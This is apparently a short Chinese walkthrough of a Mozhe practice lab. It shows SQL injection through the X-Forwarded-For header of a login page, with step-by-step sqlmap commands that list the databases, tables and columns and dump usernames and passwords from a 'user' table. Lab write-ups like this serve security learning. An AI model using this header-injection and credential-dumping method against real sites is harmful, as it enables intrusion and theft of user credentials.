墨者学习01

                                                                               By/shy014

1.在网站登陆处抓包，发现提示IP已被记录。

2.添加X-Forwarded-For字段，随意给予IP，发现被记录的IP发生了更改，说明X-Forwarded-For字段的内容可控，且很有可能保存在数据库当中

3.将数据包保存为TXT文件，并将X-Forwarded-For字段内容置为*，提示sqlmap该处存在sql注入漏洞。

python2 sqlmap.py -r C:\Users\shy\Desktop\444.txt

4.读取数据库：python2 sqlmap.py -r C:\Users\shy\Desktop\444.txt --dbs -v 3

5.获得表名：python2 sqlmap.py -r C:\Users\shy\Desktop\444.txt -D webcalendar --tables

6.获得字段：python2 sqlmap.py -r C:\Users\shy\Desktop\444.txt -D webcalendar -T user –columns

7.获得内容：python2 sqlmap.py -r C:\Users\shy\Desktop\444.txt -D webcalendar -T user -C"id ,password,username" –dump

8.登陆网站，获得key